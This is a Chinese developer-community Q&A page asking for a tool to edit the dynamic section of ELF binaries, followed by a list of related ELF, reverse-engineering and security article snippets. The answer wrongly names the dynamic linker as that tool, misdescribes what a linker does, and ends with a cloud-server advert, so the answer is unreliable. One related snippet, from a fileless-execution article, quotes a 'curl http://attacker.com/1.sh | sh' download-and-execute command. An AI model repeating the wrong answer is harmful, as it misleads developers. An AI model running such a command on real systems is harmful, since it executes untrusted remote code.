开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

用于修改ELF二进制文件的动态部分的工具

是动态链接器（Dynamic Linker）。

动态链接器是一个操作系统提供的工具，用于在程序运行时将程序的目标文件与共享库文件进行动态链接，以生成可执行文件。它负责解析和加载共享库，并将共享库中的符号地址与程序中的引用进行绑定，使程序能够正确地调用共享库中的函数和变量。

动态链接器的主要作用是实现代码的共享和重用，减小可执行文件的体积，提高程序的运行效率。它能够在程序运行时根据需要加载和卸载共享库，使得程序可以灵活地使用各种功能模块。

动态链接器的优势包括：

减小可执行文件的体积：动态链接器将共享库与可执行文件分离，使得可执行文件只包含必要的代码和数据，减小了文件的体积。
提高程序的运行效率：由于共享库可以被多个程序共享使用，因此可以减少内存占用，并且减少了程序的加载时间和启动时间。
简化程序的维护和更新：如果共享库需要更新或修复bug，只需要替换共享库文件，而不需要重新编译和发布整个程序。

动态链接器的应用场景包括：

软件开发：在软件开发过程中，可以使用动态链接器将不同的模块进行动态链接，提高代码的重用性和可维护性。
系统编程：在系统编程中，可以使用动态链接器加载系统提供的共享库，实现对系统资源的访问和操作。
插件系统：动态链接器可以用于实现插件系统，使得程序可以动态加载和卸载插件，扩展程序的功能。

腾讯云提供的相关产品是云服务器（CVM），它提供了强大的计算能力和稳定的网络环境，可以满足动态链接器的运行需求。您可以通过以下链接了解更多关于腾讯云云服务器的信息：

https://cloud.tencent.com/product/cvm

相关搜索:分析混淆的ELF二进制文件 ELF文件的.dynamic部分中的DT_USED条目用于检查.lib文件的工具？Git修改二进制文件的行尾用于Photoshop/Illustrator和相关二进制文件的最佳版本控制工具？差异工具,可以比较文件的子部分可用于创建BPMN文件的工具如何读取二进制文件，修改相同的文件，并保存修改后的文件？如果从节中删除NOLOAD，则从elf文件生成的二进制文件会爆炸在ELF核心文件中，哪个部分存储了所调用命令的信息？用于修改ZIP文件的C++库用于比较xml文件的工具或库如何通过C#修改txt文件的某些部分 Bootstrap工具提示不适用于动态生成的元素用于查找文件名的数字部分的QRegularExpression 用于android FFmpeg和SOX的二进制文件用于CSV文件的快速免费桌面SQL工具从xsd生成xml文件的工具(用于测试)动态查找调用python的C二进制文件的路径帮助逆向工程二进制文件格式的工具

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

SCA技术进阶系列（三）：浅谈二进制SCA在数字供应链安全体系中的应用

数字经济时代，随着开源应用软件开发方式的使用度越来越高，开源组件逐渐成为软件开发的核心基础设施，但同时也带来了一些风险和安全隐患。为了解决这些问题，二进制软件成分分析技术成为了一种有效的手段之一。通过对二进制软件进行成分分析，可以检测其中的潜在风险，并提供对用户有价值的信息。

03

HCRootkit Sutersu Linux Rootkit 分析

1、Lacework Labs在Avast公司的同事最近初步的鉴定基础之上，标识出与 HCRootkit / Sutersu Linux Rootkit活动相关的新样本和基础设施。

02

Linux上一个恶意程序分析实例:一步一步揭开病毒程序的面纱

本节我们结合前面的知识点，通过动手实践来分析一个”恶意“程序。这次我们使用的例子具有极强的动手实践性，它也非常能代表恶意程序入侵系统的很多流程步骤，跟着做下来你一定收获颇多。

01

Go：深入探讨 debug`库及其在系统运维中的应用

Go 语言以其高效和简洁著称，是许多现代软件开发的首选语言之一。作为一个强大的编程语言，Go 提供了丰富的标准库，其中 debug 库尤为重要。本文将深入探讨 Go 语言的 debug 库，解释其各个子包的功能，并探讨在系统运维中的实际应用。

01

9个基本的GNU binutils 工具【Linux-Command-line】

想象一下，尽管无法访问软件的源代码，但仍然能够理解软件的实现方式，在其中找到漏洞，并且（更好的是）修复了错误。凡此种种都源于二进制形式。听起来像是拥有超能力，不是吗？

05

【开发环境】010 Editor 工具 ( 工具下载 | 二进制文件分析模板模板安装 | 快捷键查看与设置 )

下载地址 : https://download.csdn.net/download/han1202012/9515426

01

ELF格式及其常用的几个函数

ELF（Executable and Linkable Format）是一种可执行文件和可链接文件的标准格式，用于在Linux和Unix系统中存储程序和库文件。它是一种二进制文件格式，包含程序的代码、数据、符号表、段表等信息。

01

万字图文 | 你写的代码是如何跑起来的？

我们在写完代码后，进行简单的编译，然后在 shell 命令行下就可以把它启动起来。

03

嵌入式Linux驱动开发——汇编点灯

🚀🚀这个地方的代码还是很简单的，主要就是去哪找CCM的地址，不过也不算难找，比如CCGR0，就是0x020c4068。

01

Android external扩展工程

Android的扩展工程包含在external文件夹中，这是一些经过修改后适应Android系统的开源工程，这些工程有些在主机上运行，有些在目标机上运行；工程名称工程描述 aes 高级加密标准（Advanced Encryption Standard） apache-http Http服务器 bison （主机）自动生成语法分析器程序 bluez 蓝牙库 bsdiff （主机）用于二进制文件生成补丁 bzip2 （主机/目标机）压缩文件工具 clearsilver （主机）模板语言，包括Python、J

04

Polypyus：一款功能强大的固件源码分析工具

Polypyus Polypyus支持从相似的二进制文件中提取出已知函数，并以此来学习如何再原始二进制文件中定位函数。该工具是一个固件源码分析工具，它不需要对二进制文件进行反汇编，这就是它的一个很大的优势，因为有些二进制文件的反汇编是比较困难的。除此之外，该工具仅对二进制源码进行分析，因此它的执行速度非常快，在几秒钟之内即可完成。但是，该工具所使用的方法要求二进制文件使用相同的体系结构，并且具有类似的编译器选项。 Polypyus支持集成到现有工具的工作流中，比如说Ghidra、IDA、BinDiff和Di

00

几个命令了解ELF文件的”秘密“

在Linux中，可执行文件的格式是ELF格式，而有一些命令可以帮助我们了解它们更多的“秘密”，以此来帮助我们解决问题。

02

linux后台开发常用调试工具

一、编译阶段 nm 获取二进制文件包含的符号信息 strings 获取二进制文件包含的字符串常量 strip 去除二进制文件包含的符号 readelf 显示目标文件详细信息 objdump 尽可能反汇编出源代码 addr2line 根据地址查找代码行二、运行阶段 gdb 强大的调试工具 ldd 显示程序需要使用的动态

HardeningMeter：一款针对二进制文件和系统安全强度的开源工具

HardeningMeter是一款针对二进制文件和系统安全强度的开源工具，该工具基于纯Python开发，经过了开发人员的精心设计，可以帮助广大研究人员全面评估二进制文件和系统的安全强化程度。

01

Android so文件浅析「建议收藏」

一. 简述 Android中的so文件是动态链接库，是二进制文件，即ELF文件。多用于NDK开发中。

01

Linux进程启动过程分析do_execve(可执行程序的加载和运行)---Linux进程的管理与调度（十一）

我们前面提到了, fork, vfork等复制出来的进程是父进程的一个副本, 那么如何我们想加载新的程序, 可以通过execve来加载和启动新的程序。

03

Linux上的程序是怎样运行的

就会出现如下结果。ps 在此处，我们可以人为ls为可执行程序的名称，--version 是该程序需要的参数。

03

Linux下程序是怎样执行的

就会出现如下结果。ps 在此处，我们可以人为ls为可执行程序的名称，--version 是该程序需要的参数。

05

Linux动态链接库的使用

动态链接库与普通的程序相比而言，没有main函数，是一系列函数的实现。通过shared和fPIC编译参数生产so动态链接库文件。程序在调用库函数时，只需要连接上这个库即可。例如下面实现一个简单的整数四则运输的动态链接库，定义的caculate.h和caculate.c两个文件，生产libcac.so动态链接库。

01

【译】如何在生产环境跟踪 GO 函数的参数

原文地址：https://blog.px.dev/ebpf-function-tracing/

02

ELF文件-逆向工具

1、ELF文件内容解析 readelf: 可解析ELF文件的所有内容; strings: 查看ELF文件中的字符串; file : 查看ELF文件的信息; nm : 查看ELF文件中的符号信息; ldd : 查看ELF文件所依赖的库文件;

02

内核级木马与病毒攻防：Linux可执行文件的ELF格式描述

要想在Linux系统上实现逆向工程，分析，设计或查杀病毒和恶意代码，你不得不深入掌握其可执行文件的ELF格式，这样你才能了解进程在内存空间的布局和运行的基本规律，这样你才能有针对性的设计有效的病毒或恶意代码入侵系统。

01

镜像的文件类型

bootrom或VxWorks镜像一般可以编程成多种文件类型，例如bootrom、bootrom.bin、bootrom.hex、bootrom.pxe、vxWorks、vxWorks.bin等

03

eBPF 概述：第 4 部分：在嵌入式系统运行

在本系列的第 1 部分和第 2 部分，我们介绍了 eBPF 虚拟机内部工作原理，在第 3 部分我们研究了基于底层虚拟机机制之上开发和使用 eBPF 程序的主流方式。

01

Linux无文件渗透执行ELF

注：本文仅用于知识分享，请勿用于非法攻击，任何后果与本团队无关。 01 简介在进行Linux系统的攻击应急时，大家可能会查看pid以及/proc相关信息，比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令，通过/proc/$pid/exe抓样本等，但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢？最近看了一篇@MagisterQuis写的文章https://magisterquis.githu

08

在生产环境中使用 eBPF 调试 GO 程序

这是本系列文章的第一篇，讲述了我们如何在生产环境中使用 eBPF 调试应用程序而无需重新编译/重新部署。这篇文章介绍了如何使用 gobpf 和 uprobe 来为 Go 程序构建函数参数跟踪程序。这项技术也可以扩展应用于其他编译型语言，例如 C++，Rust 等。本系列的后续文章将讨论如何使用 eBPF 来跟踪 HTTP/gRPC/SSL 等。

01

Go每日一库之154：eCapture（无需CA证书抓包https）

eCapture是一款基于eBPF技术实现的用户态数据捕获工具。不需要CA证书，即可捕获https/tls的通讯明文。

02

C/C++编程可用的Linux自带工具

GNU Binary Utilities或binutils是一整套的编程语言工具程序，用来处理许多格式的目标文件。当前的版本原本由在Cygnus Solutions的程序员以Binary File Descriptor library（libbfd）所撰写。这个工具程序通常搭配GCC、make、和GDB这些程序来使用。相关网址：https://www.gnu.org/software/binutils/ addr2line - （可将一个地址转换成对应的源代码文件名和行号）Converts addresses into filenames and line numbers. ar - （打包静态库工具，用法如：ar cru libx.a a.o b.o d.o）A utility for creating, modifying and extracting from archives. c++filt - （解码C++名字工具，使用nm看到是编码后的名字）Filter to demangle encoded C++ symbols. nm - （列出所有符号）Lists symbols from object files. objdump - （显示目标文件的相关信息，亦可反汇编）Displays information from object files. ranlib - （为静态库文件产生索引）Generates an index to the contents of an archive. readelf - （显示ELF文件的内容）Displays information from any ELF format object file. size - （列出文本段、数据段等大小）Lists the section sizes of an object or archive file. strings - （列出任何二进制文件内的可显示字符串）Lists printable strings from files. strip - （删除符号表工具，文件可以瘦身，但gdb将不能工作）Discards symbols. gprof - （性能分析工具）Displays profiling information. objcopy - （复制目标文件，过程中可以修改）Copies and translates object files. dlltool - （创建Windows动态库工具）Creates files for building and using DLLs. gold - （用来替代ld的链接工具，不过只能用于生成可执行程序，而不能用于生成共享库）A new, faster, ELF only linker, still in beta test. nlmconv - （可以转换成NetWare Loadable Module目标文件格式）Converts object code into an NLM. windmc - （产生Windows消息资源）A Windows compatible message compiler. windres - （Windows资源文件编译器）A compiler for Windows resource files.

02

[译] 第 1 部分: 在生产环境中使用 eBPF 调试 Go 程序

这是本系列文章的第一篇, 讲述了我们如何在生产环境中使用 eBPF 调试应用程序而无需重新编译/重新部署. 这篇文章介绍了如何使用 gobpf 和 uprobe 来为 Go 程序构建函数参数跟踪程序. 这项技术也可以扩展应用于其他编译型语言, 例如 C++, Rust 等. 本系列的后续文章将讨论如何使用 eBPF 来跟踪 HTTP/gRPC/SSL 等.

01

完全可复制、经过验证的 Go 工具链

开源软件的一个关键优势是任何人都可以阅读源代码并检查其功能。然而，大多数软件，甚至是开源软件，都以编译后的二进制形式下载，这种形式更难以检查。如果攻击者想对开源项目进行供应链攻击，最不可见的方式是替换正在提供的二进制文件，同时保持源代码不变。

01

一个elf程序实现代码注入的实例

本节我们看看如何针对ELF可执行文件实现代码注入，这是一个简单的实例，但却可以有效的揭开冰山的一角。

02

听GPT 讲Rust源代码--compiler(23)

文件riscv64gc_unknown_fuchsia.rs位于Rust源代码中的rustc_target/src/spec目录下，它的作用是为RISC-V 64位架构提供目标特定的配置和特性定义。

01

加密固件分析实战

设备固件的安全性分析是IoT安全审计中非常重要的部分。获取固件是分析中的众多挑战之一，你可以通过多种技术来做到这一点。拥有固件后，就可以对其进行更仔细的分析。获取设备固件的最简单方法是从供应商更新服务器（通常是FTP服务器）下载，服务器中存储了不同版本的固件，而获取下一个版本的技术已编码在固件中。为了防止这种情况，供应商已开始以加密形式在服务器上存储固件，因此，即使你获取了固件，在进行进一步分析之前仍需要对其进行解密。

02

MSVC/GCC/NDK:将二进制文件生成obj文件

如何将二进制文件作为数据添加到自己程序中?这是我最近遇到的问题,google上找到这两篇说得已经很清楚: 《Embedding of binary data into programs》《Embed

03

Linux工具学习之【gcc/g++】

书接上文，我们已经学习了 Linux 中的编辑器 vim 的相关使用方法，现在已经能直接在 Linux 中编写C/C++代码，有了代码之后就要尝试去编译并运行它，此时就可以学习一下 Linux 中的编译器 gcc/g++ 了，我们一般使用 gcc 编译C语言，g++ 编译C++（当然 g++ 也可编译C语言），这两个编译器我们可以当作一个来学习，因为它们的命令选项都是通用的，只是编译对象不同。除了编译器相关介绍外，本文还会库、自动化构建工具、提权等知识，一起来看看吧

02

高级语言的编译：链接及装载过程介绍

引言随着越来越多功能强大的高级语言的出现，在服务器计算能力不是瓶颈的条件下，很多同学会选择开发效率高，功能强大的虚拟机支持的高级语言（Java），或者脚本语言（Python，Php）作为实现功能的首选，而不会选择开发效率低，而运行效率高的 C/C++ 作为开发语言。而这些语言一般情况下是运行在虚拟机或者解释器中，而不需要直接跟操作系统直接打交道。虚拟机和解释器相当于为高级语言或者脚本语言提供了一个中间层，隔离了与操作系统之间进行交互的细节，这为工程师们减少了很多与系统底层打交道的麻烦，大大提高了工程师的

08

【Rust日报】2024-02-19 Linux 内核准备升级至 Rust 1.77

Linux 6.8 内核已经升级至 Rust 1.75，而最新的补丁则将内核的 Rust 代码迁移到 Rust 1.76，并准备好迎接即将发布的 Rust 1.77。 Rust 1.77 稳定了内核 Rust 代码使用的单字段 "offset_of" 功能，并添加了一个"--check-cfg" 选项，内核 Rust 代码未来可能会过渡到这个选项。这符合 Rust for Linux 跟踪上游 Rust 版本升级的政策，直到确定了所有使用的功能都被认为是稳定的最低版本为止。预计将在即将到来的 Linux 6.9 内核合并窗口中进行对 Rust 1.77 的升级。

01

Hypervisor Necromancy；恢复内核保护器(1)

--[ 0 - 简介直到最近，为了在运行时攻击者破坏整个系统发现并利用内核漏洞。这使他们能够执行各种动作；在内核上下文中执行恶意代码，修改内核数据结构以提升权限，访问受保护的数据，等已经引入了各种缓解措施来防止此类动作和管理程序也被使用，除了他们的为实现这一目标而使用传统的虚拟化支持。在里面 ARM 虚拟化促进了 Android 生态系统扩展，允许供应商/OEM 实施自己的保护功能/逻辑。另一方面，Android 设备已普遍成为主要的 PITA 由于引入的 OEM 和供应商种类繁多，

ELF文件程序表头和代码实现ELF文件加载

前面章节我们了解了ELF文件的头部结构，这次我们深入了解另一个非常重要的数据结构，那就是程序表头。操作系统严重依赖该结构来加载ELF文件或是实现动态链接。程序表头反映的是当ELF加载到内存后所形成的“视图”或结构，也就是说ELF文件存在硬盘上或者被加载到内存，它展现出来的形态不一致。

03

现今 Swift 包中的二进制目标

在 iOS 和 macOS 开发中， Swift 包现在变得越来越重要。Apple 已经努力推动桥接那些缝隙，并且修复那些阻碍开发者的问题，例如阻碍开发者将他们的库和依赖由其他诸如 Carthage[1] 或 CocoaPods[2] 依赖管理工具迁移到 Swift 包依赖管理工具的问题，例如没有能力添加构建步骤的问题。这对任何依赖一些代码生成的库来说都是破坏者，比如，协议和 Swift 生成。

02

Android 动态库压缩壳的实现

01

Mach-O文件结构

作为iOS，iPadOS、macOS平台的可执行文件格式，Mach-O文件涉及App启动运行、bitcode分析、 crash符号化等诸多多个功能：

02

使用 Kubernetes 模糊测试

在阅读了一篇关于0days 用 30 行代码 fuzzingradare2的文章后，我认为扩展这项研究并将其代码移植到容器并部署到 Kubernetes 集群中将是一个有趣的周末项目。更进一步，构建 radare2 项目的主分支的新版本，并将其集成到 CI/CD 管道中，然后将容器构建部署到 Kuberentes 集群，这似乎是一种真正过火的好方法，只是吃掉我的全部周末。最终结果最终看起来类似于下图。

02

IDA pro简介

本周分享的工具是IDA Pro 7.0。IDA Pro全称是交互式反汇编器专业版（Interactive Disassembler Professional），简称IDA，它是一种典型的递归下降反汇编器。IDA并非免费软件，但Hex-Rays公司提供了一个功能有限的免费版本。IDA是Windows，Linux或Mac OS X托管的多处理器反汇编程序和调试程序，它提供了许多功能，是一款很强大的静态反编译工具。支持很多插件和python，利用一些插件可以提供很多方便的功能大大减少工作量，在CTF中，逆向和pwn都少不了它，更多强大的功能等待童鞋们自己去学习挖掘，三言两语讲不完。它支持数十种CPU指令集其中包括Intel x86，x64，MIPS，PowerPC，ARM，Z80，68000，c8051等等。 IDA pro7.0（绿色英文版）和部分插件+ 《IDAPro权威指南第2版》已经上传至群文件，来源于：吾爱破解论坛。论坛也有汉化版，英文原版本习惯了都一样。看雪有一个 IDA pro插件收集区，大家有需要也可以去那找https://bbs.pediy.com/forum-53.htm

03

Linux 程序编译过程详解

大家肯定都知道计算机程序设计语言通常分为机器语言、汇编语言和高级语言三类。高级语言需要通过翻译成机器语言才能执行，而翻译的方式分为两种，一种是编译型，另一种是解释型，因此我们基本上将高级语言分为两大类，一种是编译型语言，例如C，C++，Java，另一种是解释型语言，例如Python、Ruby、MATLAB 、JavaScript。

03

Linux 程序编译过程的来龙去脉

大家肯定都知道计算机程序设计语言通常分为机器语言、汇编语言和高级语言三类。高级语言需要通过翻译成机器语言才能执行，而翻译的方式分为两种，一种是编译型，另一种是解释型，因此我们基本上将高级语言分为两大类，一种是编译型语言，例如C，C++，Java，另一种是解释型语言，例如Python、Ruby、MATLAB 、JavaScript。

03

Linux 程序编译过程详解

大家肯定都知道计算机程序设计语言通常分为机器语言、汇编语言和高级语言三类。高级语言需要通过翻译成机器语言才能执行，而翻译的方式分为两种，一种是编译型，另一种是解释型，因此我们基本上将高级语言分为两大类，一种是编译型语言，例如C，C++，Java，另一种是解释型语言，例如Python、Ruby、MATLAB 、JavaScript。

03

从Go的二进制文件中获取其依赖的模块信息

我们用 Go 构建的二进制文件中默认包含了很多有用的信息。例如，可以获取构建用的 Go 版本：

01

深入了解 Go ELF 信息

我们用 Go 构建的二进制文件中默认包含了很多有用的信息。例如，可以获取构建用的 Go 版本：

02

zephyr笔记 2.1 应用程序开发基础

官方把这个教程放偏后的位置，导致我之前自己去学习 Cmake 和 Ninja 的相关知识，多做了一些重复工作。

02

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭